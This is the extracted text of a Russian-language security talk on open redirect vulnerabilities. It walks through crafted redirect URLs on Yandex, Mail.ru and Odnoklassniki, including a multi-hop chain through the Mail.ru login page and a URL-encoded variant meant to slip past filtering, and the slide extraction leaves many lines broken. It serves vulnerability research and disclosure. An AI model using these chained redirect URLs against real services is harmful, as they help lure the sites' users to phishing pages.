Не верь своим редиректам

Не верь своим

редиректам

anonimous@localhost :~$ whoami

BigBear

anonimous@localhost:~$ id

uid=1020(pentest) gid=100(antichat) groups=101(rdot)

@i_BigBear

about me:

Open Redirects

OWASP Description:

An open redirect is an application that

takes a parameter and redirects a user

to the parameter value without any

validation.

This vulnerability is used in phishing

attacks to get users to visit malicious

sites without realizing it.

Open Redirects

Open Redirects

Client Server 1

Server 2

1.php?redir=http://server2

header("Location: http://server2/");

Open Redirects

Client Server 1

Server 2

1.php?redir=http://anyhost

header("Location: http://anyhost/");

Open Redirects

Open Redirects

@Black2Fan

Open Redirects

Client Server 1

Server 2

1.php?redir=http://server2

header("Location: http://server2/");

any host


Open Redirects

http://yandex.ru/clck/jsredir?from=yande

x.ru%3Byandsearch%3Bweb%3B%3B&text=&

etext=635.A3K9EhGzrzdN

http://yabs.yandex.ru/count/RhnEbYF

Y6Pm4000

http://awaps.yandex.net/1/c1/tx

21lszVf7wve-k2Rifa_A_.swf*click_num=0

http://an.yandex.ru/count/asfa3573vsv

sTTvssb9dYYe

Open Redirects

Open Redirects

https://mail.yandex.ru/

?retpath=https://mail.yandex.ru/neo2/#inbox


?retpath=https://google.com

Open Redirects


?retpath=https://an.yandex.ru/cou

nt/JcnAPGOmkJy40000Zh_yYqi5XPvP5vK1c

m5kGxS298Yuvo_10OczVX8D0fYihxs-

dWQThty64fQpheHU0Rhm6mcCwDvLyGMc

6ugmgHN00Rs_yYMp0Qe1fQc4nmEyg9iX0v

6rhcBQ1u

Open Redirects

Why ???

Open Redirects

https://auth.mail.ru/cgi-

bin/auth?FakeAuthPage=&Page=http://d

eti.mail.ru/


bin/auth?FakeAuthPage=&Page=http://

google.com/

Open Redirects

«Многоходовочка» :-)

Step 1: Ищем поддомены

Step 2: Ищем редиректы

на них

Open Redirects

http://ok.ru/dk?cmd=logExternal&st.cmd=logExt

ernal&st.name=62670701063111&st.link=h

ttp://www.yandex.ru/


Open Redirects


Step 3: Тестируем…

“http://odnoklassniki.mail.ru”


bin/auth?FakeAuthPage=&Page=http://o

dnoklassniki.mail.ru/

Open Redirects

Client auth.mail.ru

Odnoklassniki.ru

?page=http://odnoklassniki

%3Fmany-many-params

header("Location: http://odnoklassniki

%3Fmany-many-params/");

any host


Open Redirects



odnoklassniki.mail.ru/dk?cmd=

logExternal&st.cmd=logExternal&st.name=62

670701063111

&st. link=http://www.yandex.ru/

Open Redirects





670701063111&st.link=http://anyhost/

Open Redirects

Open Redirects





63111

&st. link=http://www.yandex.ru/





63111

&st. link=http://any.yandex.ru/

Open Redirects





11&st. link=http://

an.yandex.ru/count/JcnAPGOmkJy40000Zh_yYqi5XP

vP5vK1cm5kGxS298Yuvo_10OczVX8D0fYihxs-

dWQThty64fQpheHU0Rhm6mcCwDvLyGMc6ugmgHN

00Rs_yYMp0Qe1fQc4nmEyg9iX0v6rhcBQ1u--x8jD1v-

uiY4R3fE539bYGeoGdoIWaDGmhv2V9AUEcQYmG5b

p1wJ00000J0MkyUW8iyWCm0m5iB2-

9f03iG6oYbEvhty64hl-

rfaBeJVud071__________yFVnO0

Open Redirects





11&st. link=http ://

an.yandex.ru%2f%63%6f%75%6e%74%2f%4a%63%6e

%41%50%47%4f%6d%6b%79%57%43%6d%30%6d%3

5%69%42%32%2d%39%66%30%33%69%47%36%6f%

59%62%45%76%68%74%79%36%34%68%6c%2d%72

%66%61%42%65%4a%56%75%64%30%37%31%5f%5f

%5f%5f%5f%5f%5f%5f%5f%5f%79%46%56%6e%4f%3

0

Open Redirects

Client odnoklassniki.mail.ru

ok.ru an.yandex.ru

auth.mail.ru

anyhost


Спасибо за внимание !

@i_BigBear

Не верь своим редиректам

Technology

Transcript of Не верь своим редиректам